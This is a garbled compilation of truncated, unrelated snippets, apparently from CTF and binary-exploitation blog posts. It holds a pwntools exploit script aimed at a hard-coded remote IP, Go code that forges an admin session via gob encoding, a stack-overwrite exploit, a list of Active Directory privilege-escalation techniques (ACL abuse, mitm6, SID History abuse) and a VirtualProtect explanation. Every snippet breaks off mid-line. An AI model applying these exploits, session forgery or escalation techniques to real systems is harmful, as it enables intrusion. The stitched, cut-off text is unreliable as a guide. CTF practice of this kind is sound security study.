#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import requests, sys, os, urllib, IPython
s = requests.session()
#URL = 'http://localhost:23333/'
URL = 'http://39.96.13.247:9999/'
def add_person(name, is_tutor=0):
    url = URL + 'add_person?'
    url += 'name=' + urllib.quote(name)
    url += '&is_tutor=...
error) {
	for _, v := range obj {
		gob.Register(v)
	}
	buf := bytes.NewBuffer(nil)
	err := gob.NewEncoder(buf).Encode(obj)
	return buf.Bytes(), err
}
func main() {
	var uid int64 = 1
	obj := map[interface{}]interface{}{"username": "admin", "UID": uid}
	data, err := EncodeGob(obj)
	if err...
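ACTF, the final event of this year's XCTF, has wrapped up, and our team held on to 19th place in the end, which should be enough for a ticket to the finals. But in ACTF I scored a miserable zero on the pwn challenges. Although I was the only one working on them, that is no excuse for slacking off; after all, I need to keep growing into one of the team's core members, and with so many strong players my own age around me, I have even less reason to be discouraged. During military training I reproduced Tree_pwn, and under the guidance of uuu (https://caffeine.darkflow.top/) I learned...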
aclpwn.py Invoke-ACLPwn Abusing IPv6 with mitm6 Compromising IPv4 networks via IPv6 mitm6 SID History Abuse WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't enabled (most of the time it is not), we can abuse it to privilege escalate to Domain ...
from pwn import *
offset = 0x84
#p = remote('111.198.29.45',58615)
p = process('./stack2')
p.sendlineafter("How many numbers you have:", '1')
p.sendlineafter("Give me your numbers", '1')
# Eight overwrites are needed in total, and the program's normal flow must still be followed, so a simple helper function is needed
def change(addr, num):
    p.sendli...
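[jarvisoj practice journey] Writeup for the pwn challenge Tell Me Something. Challenge info: running file shows that it is a 64-bit ELF. Check its protections with checksec. objdump -t <filename> lists the symbol table; here good_game looks suspicious. Analysis in IDA also shows flag.txt, read, read and so on. Double-click the references to "Input your message" and flag.txt in turn, then press F5 ... ...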
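#include <Memoryapi.h>
BOOL VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
The VirtualProtect() function takes 4 parameters: lpAddress is the starting address of the memory whose attributes are to be changed, dwSize is the size of the memory region whose attributes are to be changed, flAllocationType is the new attribute type for the memory, and lpflOldProtect is the address where the memory's original attribute type is saved. And flAllocationType...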